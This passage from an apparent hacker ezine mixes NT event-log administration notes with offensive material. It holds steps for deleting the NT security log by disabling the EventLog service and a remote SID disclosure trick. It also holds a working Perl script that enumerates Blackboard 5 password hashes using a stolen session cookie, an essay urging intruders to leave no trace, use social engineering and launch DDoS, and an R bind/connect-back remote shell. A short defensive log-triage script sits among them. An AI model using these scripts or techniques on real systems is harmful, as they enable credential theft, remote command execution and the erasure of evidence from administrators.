the Services tool in Control Panel. Let me comment on this last phrase from MS HELP "You can stop event logging with the Services tool in Control Panel" WELL IT IS NOT TRUE, YOU CANNOT STOP EVENT VIEWER WHILE YOU ARE RUNNING NT. WHAT YOU CAN DO IS DISABLE IT THAT MEAN NEXT TIME YOU REBOOT THE EVENT VIEWER SERVICE WILL BE STOPED. 
So to sum up: you cannot STOP EVENTLOG from the GUI, you can only disable it,
and from the command line you will get this:

----------------------------------------------[NET STOP EVENTLOG DUMP]------
C:\>net stop EVENTLOG
The requested pause or stop is not valid for this service.

More help is available by typing NET HELPMSG 2191.

C:\>NET HELPMSG 2191

The requested pause or stop is not valid for this service.

EXPLANATION

This command is invalid for this service, or the service cannot accept the
command right now.

ACTION

If the service normally accepts this command, try typing it again later.
----------------------------------------------------------------------------

LOGS TYPE
=========

The three types of NT event logs are:

System log
----------
Tracks miscellaneous system events, e.g. events during system startup and
hardware and controller failures.

Application log
---------------
Tracks application-related events, e.g. informational messages generated by
applications, such as failing to load a DLL, will appear in this log.

Security log
------------
Tracks events such as logon, logoff, changes to access rights, and system
startup and shutdown. As you will see later in this paper, security auditing
is turned off by default.

LOGS LOCATION AND ENABLING
==========================

The location of the NT logs is:

%SYSTEMROOT%\system32\config\SysEvent.Evt
%SYSTEMROOT%\system32\config\SecEvent.Evt
%SYSTEMROOT%\system32\config\AppEvent.Evt

By default NT does NOT log all events. You have to enable auditing; to do so
follow these steps:

1- From the Start Menu, choose Programs and then Administrative Tools (Common).
   From the Administrative Tools submenu, choose User Manager, which displays
   the User Manager window.
2- From the User Manager menu click POLICIES, then click Audit; the Audit
   Policy window appears.
3- Select the radio button "Audit These Events".
4- Select what you want, click OK and close User Manager :)

NOTE: If you decide to audit all events you had better HAVE SOME KICK ASS
MACHINE, because this is going to suck a lot of resources.

Auditing of Privileges
======================

Certain privileges in the system are not audited by default even when auditing
of privilege use is turned on. This is done to control the growth of audit
logs. The privileges are:

1- Bypass traverse checking
   *** To Everyone ***
   Is granted to everyone, so is meaningless from an auditing perspective.
2- Debug programs
   *** To Administrators ***
   Not used in a working system and can be removed from the Administrators
   group.
3- Create a token object
   *** To No One ***
   Should not be granted to anyone.
4- Replace process level token
   *** To No One ***
   Should not be granted to anyone.
5- Generate Security Audits
   *** To No One ***
   Should not be granted to anyone.
6- Backup files and directories
   *** To Administrators, Backup Operators ***
   Used during normal system operations.
7- Restore files and directories
   *** To Administrators, Backup Operators ***
   Used during normal system operations.

To enable auditing of these privileges, add the following key:

Hive:  HKEY_LOCAL_MACHINE\SYSTEM
Key:   System\CurrentControlSet\Control\Lsa
Name:  FullPrivilegeAuditing
Type:  REG_BINARY
Value: 1

Or create a text file called audit.reg and paste in the lines below:

-----------------------------------------------------------[SNIP HERE]------
REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"FullPrivilegeAuditing"=hex:01
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------

To merge the .reg file, either double-click on it, or open a command prompt
and type:

REGEDIT /S audit.reg

This will merge the file you have created.

Auditing Base Objects
=====================

This registry setting tells the Local Security Authority that base objects
should be created with a default system audit control list. The administrator
will still need to turn auditing on for the "Object Access" category using
User Manager.

To enable auditing of base objects, add the following key:

Hive:  HKEY_LOCAL_MACHINE\SYSTEM
Key:   \CurrentControlSet\Control\Lsa
Name:  AuditBaseObjects
Type:  REG_DWORD
Value: 1

Or create a text file called auditObj.reg and paste in the lines below:

-----------------------------------------------------------[SNIP HERE]------
REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa]
"AuditBaseObjects"=dword:00000001
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------

To merge the .reg file, either double-click on it, or open a command prompt
and type:

REGEDIT /S auditObj.reg

This will merge the file you have created.

EXAMPLE
=======

What do you see when you enable Security Auditing?
IN THIS EXAMPLE I ENABLED LOGON/LOGOFF FAILURE AUDITING ONLY:

Logon Failure:
   Reason:                 Unknown user name or bad password
   User Name:              WaKiNg
   Domain:                 WaK0
   Logon Type:             3
   Logon Process:          KSecDD
   Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
   Workstation Name:       \\BRAINCELL

CLEARING NT LOGS
================

To clear a log, switch to the log you want to clear; on the Log menu click
CLEAR ALL EVENTS. A message asks if you want to archive the current events. If
you answer Yes, the SAVE AS dialog box appears. Enter the filename and folder
path where you want to store the saved log. After you answer Yes or No, Event
Viewer empties the current log. Only new events will appear in the log.

NOTE: When you clear the SECURITY LOG an event will SHOW in the Security log.
Even after you clear the log you will still see this entry:

The audit log was cleared
   Primary User Name:   SYSTEM
   Primary Domain:      NT AUTHORITY
   Primary Logon ID:    (0x0,0x3E7)
   Client User Name:    WaKiNg
   Client Domain:       BRAINCELL
   Client Logon ID:     (0x0,0x2581)

This entry means you cleared the security event log.

Now if you want to clean the log, well, you can do the following:

1- Open Control Panel and then Services
2- Locate the EVENTLOG service and click the STARTUP button
3- In Startup Type choose Manual or Disabled
4- Restart NT
5- Go to %SYSTEMROOT%\system32\config\SecEvent.Evt and delete SecEvent.Evt

By doing so the eventlog service will be stopped and you can then delete the
log you are interested in. :)

TOOLS TO MANAGE NT LOGS
=======================

I use Dumpel.exe from the NT Resource Kit; I am an old dude who loves the cmd
line :) If you like the cmd line I suggest Dumpel.exe; if not, see the links
below. I also use NTLast from NTObjectives.

Here is an example of what Dumpel.exe will report:

DUMPEL Usage:
dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3..]
       [-r] [-t] [-d x]

   -d       Filters for event last days (number larger than zero)
   -e nn    Filters for event id nn (up to 10 may be specified)
   -f       Output filename (default stdout)
   -l       Dumps the specified log (system, application, security)
   -b       Dumps a backup file (use -l to specify file name)
   -m       Filters for events logged by name
   -r       Filters out events logged by name (must use -m too)
   -s       Remote to servername
   -t       Use tab to separate strings (default is space)
   -c       Use comma to separate fields
   -ns      Do not output strings
   -format  Specify output format. Default format is dtTCISucs
            where
              t - time
              d - date
              T - event type
              C - event category
              I - event ID
              S - event source
              u - user
              c - computer
              s - strings

NTLast v2.85
------------
http://www.ntobjectives.com/ntlastv2.htm

Is specifically targeted for serious security and IIS administration.
Scheduled review of your NT event logs is critical for your network. A server
breach can be uncovered by regular system auditing. Identifying and tracking
who has gained access to your system, then documenting the details, is now
made easier with NTLast. This tool is able to quickly report on the status of
IIS users, as well as filter out web server logons from console logons.

EventReader
-----------
http://www.strongsoftware.net/eventrd/

EventReader(TM) is an administrative tool which allows network administrators
to analyze and manage event logs. The program lets you collect event logs from
Windows NT computers in a network and store the information in one or several
ODBC compatible databases (Microsoft SQL Server or Microsoft Access). You can
designate the computers from which to collect the information, and assign a
schedule and data collection and event log backup parameters. The installation
package includes a Microsoft Access sample database, which contains many
queries and reports for effective event log analysis.
Event Archiver Enterprise
-------------------------
http://www.eventarchiver.com/download.asp

Event Archiver Enterprise is one of the easiest to use products in the event
log management market, and stands above the others with its flexibility. We
think of it as a "set once, run forever" application that saves your
organization considerable time and money. Given the average hourly cost of a
Windows NT/2000 administrator, deploying Event Archiver Enterprise greatly
reduces your organization's TCO. After installing Event Archiver,
administrators can start analyzing event log entries instead of just trying to
save and store them regularly.

EventReporter Version 4.0
-------------------------
http://www.eventreporter.com/en/

Version 4.0 provides a number of important enhancements:
 - Support for message delivery via email
 - Client added - a graphical user interface for customizing EventReporter
 - Filtering of events based on severity code (e.g. error, warning)
 - Greatly enhanced documentation
 - Greatly enhanced web site - especially the support area

Remote Viewers - Event Log Monitor
----------------------------------
http://www.tntsoftware.com/products/emon22/viewers.asp

The Remote Viewer for Windows PC runs on Microsoft Windows 95, Windows 98 and
Windows NT and:
 - Lets you search and display event log information as it is received by the
   console.
 - Receives user-selected real-time alerts from the console, which are
   immediately displayed in the Remote Viewer.
 - Provides remote management for processes, services, and device drivers.
 - Provides remote search, edit, create user-defined notes and message
   reference.
 - Provides multiple remote command prompt windows.

SECURITY ISSUE FOUND WHILE I WAS WRITING THIS PAPER (THE BUG WAS NOT OUT YET)
============================================================================

To those of you who know about SIDs in NT and the tool "sid2user", which
allows you to get the SIDs of users:
Well, I found a way to get the SID, even the Administrator's, remotely, if
certain conditions are met:

1- By default NT logs can be viewed remotely :)
2- You have auditing enabled
3- Your policies lock the account after a certain failure count

Now here is what you need to do to get NT to spit out the SID
-------------------------------------------------------------

Try to log in to the remote box using any existing account; you will get a
logon failure and an entry will be generated in Event Viewer:

Logon Failure:
   Reason:                 Unknown user name or bad password
   User Name:              WaKiNg
   Domain:                 WaK0
   Logon Type:             3
   Logon Process:          KSecDD
   Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
   Workstation Name:       \\BRAINCELL

If, like I said, you have a policy that locks an account after a certain
count, you will see this entry in your log file:

User Account Locked Out:
   Target Account Name: WaKiNg
   Target Account ID:   S-1-5-21-431509504-1754822488-1124750213-500
   Caller Machine Name: \\BRAINCELL
   Caller User Name:    SYSTEM
   Caller Domain:       NT AUTHORITY
   Caller Logon ID:     (0x0,0x3E7)

So now if you connect to the remote box using Event Viewer you will be able to
see the logs, and you will see the SID:

   Target Account ID:   S-1-5-21-431509504-1754822488-1124750213-500

I did not do any other research into this, because the objective was not to
find something but to write this paper :)

===============================================================================

Cheers,

------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------

"The only secure computer is one that's unplugged, locked in a safe, and
buried 20 feet under the ground in a secret location... and I'm not even too
sure about that one" -- Dennis Hughes, FBI.
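What an admin does with these records once they are dumped, as an added example
that is not part of NtWaK0's article: a small Python triage script over a
security-log dump in the column layout the dumpel usage text above describes
(-format dtTCISucs). It counts repeated logon failures per account and
workstation (the pattern that precedes the lockout record), lists lockout
records together with the SID they expose, and reports who cleared the log, the
one entry that survives a clear. The sample dump is constructed; the assumption
that fields are tab-separated and that the type column carries the Win32
event-type code (8 = success audit, 16 = failure audit) is mine, not the
article's, and the event IDs in the sample are the NT/2000 security IDs as I
recall them (529, 644, 517); nothing in the logic depends on them.

```python
import re
from collections import Counter

# Constructed sample of a dumpel-style dump in dtTCISucs column order:
# date, time, type, category, ID, source, user, computer, strings.
# Assumed format (not from the article): tab-separated fields, Win32
# event-type code in the type column (16 = failure audit, 8 = success audit).
# Event texts are the ones the article quotes; hosts, times and counts are
# made up; the SID is the one shown in the article.
FAIL_WAKING = ("Logon Failure: Reason: Unknown user name or bad password "
               "User Name: WaKiNg Domain: WaK0 Logon Type: 3 Logon Process: KSecDD "
               "Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 "
               "Workstation Name: \\\\BRAINCELL")
SAMPLE_DUMP = "\n".join([
    "9/3/2000\t10:01:05 AM\t16\t2\t529\tSecurity\tSYSTEM\tBRAINCELL\t" + FAIL_WAKING,
    "9/3/2000\t10:01:09 AM\t16\t2\t529\tSecurity\tSYSTEM\tBRAINCELL\t" + FAIL_WAKING,
    "9/3/2000\t10:01:14 AM\t16\t2\t529\tSecurity\tSYSTEM\tBRAINCELL\t" + FAIL_WAKING,
    "9/3/2000\t10:01:20 AM\t8\t7\t644\tSecurity\tSYSTEM\tBRAINCELL\t"
    "User Account Locked Out: Target Account Name: WaKiNg "
    "Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500 "
    "Caller Machine Name: \\\\BRAINCELL Caller User Name: SYSTEM "
    "Caller Domain: NT AUTHORITY Caller Logon ID: (0x0,0x3E7)",
    "9/3/2000\t10:05:41 AM\t16\t2\t529\tSecurity\tSYSTEM\tBRAINCELL\t"
    "Logon Failure: Reason: Unknown user name or bad password "
    "User Name: guest Domain: WaK0 Logon Type: 3 Logon Process: KSecDD "
    "Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 "
    "Workstation Name: \\\\LAB2",
    "9/3/2000\t11:30:02 AM\t8\t1\t517\tSecurity\tSYSTEM\tBRAINCELL\t"
    "The audit log was cleared Primary User Name: SYSTEM "
    "Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E7) "
    "Client User Name: WaKiNg Client Domain: BRAINCELL "
    "Client Logon ID: (0x0,0x2581)",
])

FIELDS = ("date", "time", "type", "category", "event_id",
          "source", "user", "computer", "strings")
AUDIT_FAILURE = 16   # Win32 EVENTLOG_AUDIT_FAILURE


def parse_dumpel(text):
    """Split each line into the nine dtTCISucs columns. The strings column
    is everything after the eighth tab, so the event text stays intact."""
    events = []
    for line in text.splitlines():
        parts = line.split("\t", len(FIELDS) - 1)
        if len(parts) != len(FIELDS):
            continue                      # blank or truncated line
        ev = dict(zip(FIELDS, parts))
        ev["type"] = int(ev["type"])
        ev["event_id"] = int(ev["event_id"])
        events.append(ev)
    return events


def field(strings, label):
    """Pull the value following 'Label:' out of the free-text strings column."""
    m = re.search(re.escape(label) + r":\s*(\S+)", strings)
    return m.group(1) if m else None


def failed_logons(events, threshold=3):
    """Count failure audits per (account, workstation) and return the pairs
    at or above the threshold."""
    counts = Counter()
    for ev in events:
        if ev["type"] == AUDIT_FAILURE and ev["strings"].startswith("Logon Failure"):
            counts[(field(ev["strings"], "User Name"),
                    field(ev["strings"], "Workstation Name"))] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


def lockouts(events):
    """Return (account, SID) pairs from lockout records. The Target Account
    ID is the account's SID, readable by anyone allowed to view the log."""
    return [(field(ev["strings"], "Target Account Name"),
             field(ev["strings"], "Target Account ID"))
            for ev in events if ev["strings"].startswith("User Account Locked Out")]


def log_clears(events):
    """Return the client user name from each 'audit log was cleared' record."""
    return [field(ev["strings"], "Client User Name")
            for ev in events if ev["strings"].startswith("The audit log was cleared")]


def triage(text, threshold=3):
    """One-shot summary of a dump: event count, brute-force pairs, lockouts, clears."""
    events = parse_dumpel(text)
    return {"events": len(events),
            "brute_force": failed_logons(events, threshold),
            "lockouts": lockouts(events),
            "log_cleared_by": log_clears(events)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

On a real dump, feed the script the output of dumpel with -l security and -t;
the two things worth acting on are a lockout record visible to someone who
should not be reading the log (restrict remote access to the security log, as
the article's "viewed remotely by default" point implies) and a clear record
whose Client User Name is not an administrator you expect.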
-----------------------------------------------------------------
Live Well, Do Good, Accept no limitations --:)
================================================================================

--------------------------------------------------------------------------------
[Blackboard 5 Password Enumeration]==================[Case ]
--------------------------------------------------------------------------------

#!/usr/bin/perl -w
#
# Blackboard 5 md5 password hash enumerator
# By Case (phric@legions.org)
#
# Original idea and about 2 lines of code from
# pedram amini
#
# USAGE: ./bbview.pl
#
# ex. ./bbview.pl blackboard.bob.com ab \@\@38763287429gd873hd7
# make sure you escape the @ in the session id with a \ like above
# to use: go to login->preview on the Blackboard site, then in Netscape
# Tasks->Privacy & Security->Cookie Manager get the session id from the cookie
#
# You must also enumerate the user_id if not known,
# using the same technique except with all characters instead of just hex
# chars, or you can try just guessing it as first letter of first name +
# last name. The 'by' variable in the query is the database variable to
# extract for the user id; set it to user_id.
#
# Should enumerate the md5 hash, which you can crack fairly simply, it just
# might take a bit.
#

$session_id = "$ARGV[2]";   # current valid session id.
$host       = "$ARGV[0]";   # target blackboard server.
@chars = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
          'a', 'b', 'c', 'd', 'e', 'f');
$password = $ARGV[1];       # part of the hash known so far.
$num = 0;
$f = 1;                     # 1 = append a char, 0 = prepend a char.

for($x = 0; $x < 16; $x++) {
    if($f) {
        $pass = $password.$chars[$x];
    } else {
        $pass = $chars[$x].$password;
    }
    $url = "http://$host/bin/common/search.pl?action=RESULTS\\&context=USERDIR\\&type=SEARCH\\&operation=VIEW\\&keyword=\\&keywordraw=$pass\\&by=passwd";
    print `curl --cookie session_id=$session_id $url >stuff.html `;
    $bytes = `wc -c stuff.html`;
    # a response of 600-619 bytes is the empty result page
    if(!grep(/6[0-1][0-9]/, $bytes)) {
        print "Adding $chars[$x]\n";
        `cp stuff.html user.html`;
        $password = $pass;
        print "$pass\n";
        $x = -1;
    }
    if($x == 15) {
        print "Going the other way\n";
        $f = 0;
        $x = -1;
        $num++;
    }
    if($num == 2) {
        print "$password\n View user.html for user \n";
        die;
    }
}
die;

--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[The InfoSec Art of war]===========================[Mark ]
--------------------------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

/*
 * Author: Mark - VulnDev
 *
 * Why: Because someone had to. (Again)
 *
 * Following the original publication of my document a number of
 * "similar" texts appeared both in print and online.
 * I would like to briefly thank those magazine editors who were
 * extremely helpful.
 */

The application of The Art of War to the "Underground".

There are 13 main sections to Sun Tzu's Art of War. What I propose to do in
this document is to relate what I see as the most fundamental parts to the
"Underground" and the security community at large; it is by no means a
complete Psych 101 on the subject, just my thoughts.
I had actually proposed to do a relation of Taoist principles to the
Underground and "Hacking"; however, the more I looked into it, and the more
understanding I had of an alternative belief, the more I realised that actually
being a hacker/cracker/phreaker/pain in the arse is not really in line with
the required psyche for a Taoist. If "we" accept things for what they are
without question we would not question Microsoft, we would not develop and
publish exploits or code, applications or theories, and we wouldn't have need
to write this or any ezine. (Some would say that's a good thing!)

I do use a generic "him" in this document; however, of course, if you're
female you don't need to get a sex change to read this, just s/him/her/;

** MOST IMPORTANTLY I DO NOT ENDORSE, CONDONE OR IN ANY WAY ENCOURAGE ILLEGAL
ACTIVITY, I BELIEVE PEOPLE CAN THINK FOR THEMSELVES. (Foolish I know.) **

Let us proceed.

1) ** Estimates **

Moral Influence: At some point in our lives we are all affected by morality
(or in some cases, lack of it); however, this is much more about who we trust,
what we believe in and who we follow. All groups have a founder, or founders;
subsequent members of that group have to follow these persons, respecting them
as knowing more about XYZ than someone else. What moral influence should be
used for when working in security is making sure the leader has control, but
also has the trust and faith of those under him, maybe by making them feel not
as though they are under him but beside him. Of course, a skilful leader will
also allow his "troops" to see him leading them into battle, and willing to
die for the cause, when maybe he's stood behind them watching.

Weather: Sun Tzu meant this factor as operating in regard to natural forces
and seasons, and I see no reason why the community cannot react similarly; in
fact it does.
It is true, on holidays and weekends there are fewer people in offices, and so
fewer people to notice when things go wrong. A lot of SOHO companies,
especially with the advent and availability of broadband, run their servers
and leave them on 24/7; maybe during the week someone is watching, however on
Sundays? So a moral aspect of leading a campaign or defending against one is
making sure you understand your own seasonal habits.

Terrain: "...I mean distances, whether the ground is traversed with
difficulty, whether it is open or constricted, and the chances of life or
death..."

If you don't understand this easily I'm surprised; however, here we go. When
you are picking a "fight" you need to understand the distances, the avenues of
attack and where you can defend your flanks. This is not just true across the
Internet; sure, everyone has a few shell accounts up their sleeves for those
"special" occasions, however watch your "group", monitor the weak spots and
remedy them, do not leave yourself open to attack. If you take your laptop to
a convention, if you can, securely move your code, 0days, whatever, ahead of
time. An encrypted filesystem image that you can restore when you arrive is
safer than carrying things which may not be useful if publicised before an
event. Bearing in mind, when asked by airport security what version of Windows
you have, trying to explain that you don't have Windows and their software to
look for XYZ "won't work" is always amusing.. so I hear...

Command: not: rm -rf /

Command looks at the leader, whether he would put his neck on the line for his
"troops". If he cares, or if that handshake actually distracts from the knife
blade poised behind your back. If the leader is not equipped to lead, he
should not. Leadership is not something that can be learnt; it is something
intrinsic, something natural and something which, above everything else, will
define success or failure over any space of time.
It is easy to see the groups of "hackers" who get together, form websites,
sell out when they are older.. and then fire people, let's say, Mudge, for
example, who have done more for a company than anyone else. What kind of
leadership is that in someone who gets rid of one of the founding links....
there may be reason, but reason hidden in shadow is no reason at all.

Doctrine: Utilising the resources you have, knowing who your strengths are,
and how to build upon those strengths. Have you got too many layers of command
to actually have a point in having those layers at all? Look at cyber[B]army,
full of a certain kind of individual who is willing to use children to view
illegal websites because "They won't be prosecuted or jailed" because they are
below the legal age of an "adult"; that person knows who he is (don't you
MrYowler). If you can get the organisational hierarchy right, you will
succeed; if not, change your paradigm and start again!

2) ** Waging War **

When at "war", have a good spread of people with you, with their own talents,
as mentioned before. No war is best fought over a long time: be swift, get in
and get out, leave no trace on the "land" that you have been there except for
the objective being completed. You should not need a second front; you should
be able to complete the objectives with the first stand.

- --

But what the hell does this have to do with "I", you say.. well, if you have
to spend a week solving an intrusion then you're screwed; if you spend a week
solidly probing, probing again, trying to get in, failing, making a mess,
leaving log trails and then succeeding, you have probably left enough evidence
behind for you to be just as screwed. If you have to go back to cover your
tracks after you've been in, it's probably too late. Equally, if you have to
get a third party in to do the role, or an aspect of a role, which you should
do, there is going to be uncertainty over your position as an employee,
methinks.
Do not let yourself get overly confident; if you do, you will find yourself
making mistakes. Do not let your other associates have free roam if it's in
your "name"; they should stick to what they have been assigned, no more and no
less. It is for the leader to patch the holes that may be caused by projects.

Finally, "Treat the captives well and take care of them"... Self evident
really: do not cause unneeded destruction or damage, that is not what it is
about, and it just means the BBC and CNN are able to use destruction as
evidence for "Hackers being evil", when we all know it's "HaX0rs" who are
evil.. (*ahem*)

3) ** Offensive Strategy **

No, this doesn't mean that you need to be offending people through your
projects. What Sun Tzu wanted to get across is that you should capture your
objectives without destroying them, as if they are destroyed they are useless
to you. In war, as can be seen in the recent Iraq conflict, if you take out
parts of the critical infrastructure and other methods of state control, you
end up having to rebuild an entire country.. If you take control of a network,
there is little point patching their Cisco router's IOS to send everything to
the great void of a non-existent IP.. as you will have lost the functionality
of your newly found gains.

Having partaken in many wars and won is not the mark of a good army; to win
without the war, that is what proves the level of skill involved. This can
mean having to be pre-emptive on specific targets which, when neutralised,
minimise the enemy's ability (see Iraq).

In a war there are a number of key things to consider. Firstly you must target
the enemy's strategy: by knowing him, thinking how he thinks and understanding
the opposite side, you will be able to stay ahead of his strategy. A failing
example, in the face of selling out, would be the Honeynet Project. More
successful examples of this tactic will become apparent over the next few
years.
iDefense may not get excluded from these tactics; only time will tell.

Next, disrupt his alliances. This is self evident: if you can isolate the
target then there is less likelihood of you ending up surrounded by people
friendly to the target. Attacking the troops from the other side is a less
preferable but a perfectly possible method for wars over the Internet, and is
evident in wars on the physical plane. The worst plan is attacking "cities"
and the infrastructure (see above).

Understand the uses of large and small forces: if you only need two or three
people to meet an objective, do so. If you know you need to blast the target
off the map.. do so (although that's hardly elegant).

The last point that I am going to mention regarding the offensive strategy is
that delegation is key. If a leader tries to control a situation that he is
not part of, it can result in disaster; choose your decision makers in the
"field" carefully, but trust their judgement and do not undermine them, or you
may face mutiny.

In my opinion the following is the most important message to come out of the
offensive section:

"if ignorant of both yourself and the enemy you are certain in every battle to
be in peril."

Know your target, but at the same time, know yourself; if you do not know
yourself you will never reach your full potential. Common sense, folks: Google
is the greatest invasion of privacy that is readily available to the public.
USE IT! Piece together those banner grabs, Usenet posts and the like, build
the profile on the target, then hit it hard and in the correct place.

If you think you can win, you might. If you KNOW you will win, you will.
Preparing the very best defences, to make yourself invincible, does not mean
that you will win; it just means that you won't be defeated. There is no point
sitting behind an "impenetrable" network setup if your target has the same
setup: you will both be able to attack, but neither will be able to get past
the walls.
"Invincibility lies in the defence, the possibility of victory lies in the
attack"

If you aren't interested in attacking, barricade yourself behind rock, stone,
everything you can.. you will be safe.. but you will not be able to repel the
attacker, just allow them to keep attacking; therefore you will not win and
they will not lose. If you situate yourself in the "sky" all around, in
hundreds of nodes across the Internet for example, you will be fairly safe if
one is taken offline by a counter attack, AND you will be able to launch a
massive attack upon the target who, unless they have the ability to take out
all of your nodes, will still find themselves under attack. So who wins? Not
the counter attack; they are still being threatened. (i.e. SOME .gov's) This
is true for Internet worms and DDoS.. no-one has won against Code Red and
similar worms yet, it is still there (see $LOG/apache/access_log), they just
seal themselves in. However, if you find yourself in prison/fired/dead and the
attacks you started are still going, you've lost in a pretty major sense; or
alternatively, to have an attack that stays in proliferation after death could
be seen as very much winning..

If you are a leader, instil confidence in victory in your troops and they will
be unstoppable.

To have a large force of people is the same, from a command point of view, as
having a small force; it is a matter of the right groupings of the troops, the
right and accurate signals, and the ability of those under your command to
react as expected to the given command or signal.

Sun Tzu tries to get at the fact that you should use your most solid "core" to
attack the weakest "void" in the enemy. (cracking *) This makes utter and
total sense: if you are trying to penetrate the walls of a city, go through
the sewer outlets, the drains, target the areas around windows, letter boxes,
any "hole"..
and of course, when applied to a network, target the dial-up server, or the engineer sat in the bar next door who is happy to talk about the "bastard" management and will be happy to help you out with some "difficulty" you're having with your laptop; in fact, "why not bring it round to my place and I'll have a look at it". Use your resources wisely. If you need to conserve bandwidth because you are still on a slow 56k line, don't try to flood someone, as most SOHOs have more bandwidth than you; get access to someone with the bandwidth you need. ssh and telnet are VERY low-bandwidth applications which can command a much greater scale. How else would "hackers" in Indonesia, for example, be able to knock people offline from their 56k lines? By getting access to, say, a server in *.kr, where there is bandwidth.

Do not start an attack with your best -(sizeof(lifetime) * sizeof(day)) exploit. There is a potential for some anal retentive such as Spitwad (a la "Honeynet") with funding from, say, the NIC (www.cia.gov/nic) to be watching you. If you sense something isn't right, wait and look for more holes, and for the screamingly obvious things that do not fit (or throw packets (!TTL) at it if you think it's honeyd).

"When the strike of a hawk breaks the body of its prey it is because of timing." I think this can be quoted alongside "only fools rush in" and "he who hesitates is lost": enumerate, wait, enumerate, compare, decide on a course of action. However, do not rely solely upon your situation to decide when to attack or how to defend; use the five aspects mentioned in the first section to aid decision making. Bring the enemy to you. If you control the entire network, make the enemy think you only have a solitary host and draw them in, then gather what you need (they will not expect that the router they use is also controlled by you, if not strictly legally then in some cases perfectly legally), and from there you will have an advantage.

"Against those skilled in attack, an enemy does not know where to defend; against the experts in defense, the enemy does not know where to attack."

Regardless of how you go about your project, do not leave a trace; it is sloppy to do so (and not doing so saves a great deal of worry).

"When I wish to avoid battle I may defend myself simply by drawing a line on the ground; the enemy will be unable to attack me because I divert him from going where he wishes." It makes sense, doesn't it? They want to attack your web server; however, all of the packets go via a router, to a packet filter, then inbound via your IDS and other intrusion-resilience tools, to the web server. The enemy cannot get a direct line, hence cannot attack anywhere you do not enable them to. Try to stay ahead of the enemy: shift your angles, make them think you're looking at one aspect when really you are watching them watch you do so. When you do, however, do not wait for long durations unless you do so for a tactically sound reason, to confuse or hinder. If you have advanced through a land in a matter of hours and suddenly pause for no reason but your own, you will confuse the enemy; if you pause because you have run out of XYZ, they will act to cut the resources off.

** The basic moral is: be sensible. If you have to take a risk, do so; however, do not be afraid to hold your ground. Play mind games. Not only are they fun, but admins hate not being able to control things in their network or their "domain". If you suddenly divert all calls from X to H and leave no trace, and change it back every time the admin thinks he has sorted the problem out, you will stress them out and have the upper hand. Look at how groups such as PHC, Bugtraq or Gobbles have affected the "scene". They are absolutely brilliant, and have mastered how to intimidate those "scene wh0res" who try to look "big and clever". They don't intimidate (to my knowledge) with threats, but with the sheer brilliance of their code.
They seem to understand just what we were (and should still be) about. If you are defending, change the values that the enemy is getting on scans and banner grabs; they won't know what they are doing.

Don't use this information in a manner which negates the time I have spent writing it. I know there are people interested in what I have raised, and if you're not, well, you didn't need to read it, did you? I have attempted to provide an angle for thought; this will (still) be an ongoing document, available wherever mirrored.

yours, Mark

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBQPJuCoOWKXnEnFgCEQLGagCgvVcBeYp4ZmzDs6t9/q+E4DPb4NwAoOFV
i+Sz+B1G7/kgD7AXPdxQX9Px
=Qwxn
-----END PGP SIGNATURE-----

--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Connect back shell in R]=====================================[xonox@b0rken.com]
--------------------------------------------------------------------------------
[The author does not wish to educate people on the eliteness of R so there is only code - Ed.]
--------------------------------------------------------------------------------

    # Bind / connect-back shell in R. With backconnect = FALSE it listens on
    # myport; with backconnect = TRUE it connects out to myhost:myport.
    # Each line received on the socket is run through system() and the
    # command output is written back. read.socket() returns at most 256
    # bytes per call by default, so keep commands short.
    netshell <- function(myport = 12345, backconnect = FALSE, myhost) {
        if (backconnect) {
            s <- make.socket(host = myhost, port = myport)
        } else {
            s <- make.socket(port = myport, server = TRUE)
        }
        on.exit(close.socket(s))
        write.socket(s, "R netshell() (c) 2004 by xonox")
        repeat {
            write.socket(s, "\n> ")
            cmd <- read.socket(s)
            if (cmd == "") break      # empty read: peer closed the connection
            r <- paste(system(cmd, TRUE), sep = "", collapse = "\n")
            write.socket(s, r)
        }
    }

--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Insight into non-repressive governments]=============================[The Barn]
--------------------------------------------------------------------------------
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
The Barn presents its insights into democracy. For any mail please send to archimedes@legions.org to forward to us.
************************************************************************
Non-Repressive Governments.
************************************************************************

Now we at The Barn aren't the type of people to get political[1]; however, we do find that occasionally some things have to be brought to light. Therefore we have created this little article detailing, in approximate terms, the conversation had via the Barn's Bat-phone with a member of the Presidential Team from the Maldives. No other lovely nations will be discussed in this article, nor will we be writing about any country in the future (with the possible exception of the French, for their fscked laws).
We aren't going to say anything about Romania wanting into the EU and so cracking down on highly amateur computer kidiots.[4] Instead we rolled a dice and came up with a hairball (Hackers Against Hairballs would be mortified), and in the process of coughing it up the phone rang, and subsequently this is where we are: sunbathing under a few storm clouds with an electric heater that doesn't work and an attempt at third-world debt for a bank balance.

The Maldives: an island nation with more sand than you can shake a BIG stick at, where roughly lots of the GDP comes from tourism (see the CIA World Factbook for info we don't really care about). OK, it's a paradise: palm beaches, white sand, government-sponsored beatings, the works. Here are a few more choice facts about the lovely island paradise of the Maldives:

Its main religion: Irrelevant, this isn't about religion.
Its employment records: Irrelevant.
Palace Telephone Number: +960771177 [ Doh. Caller ID. ]

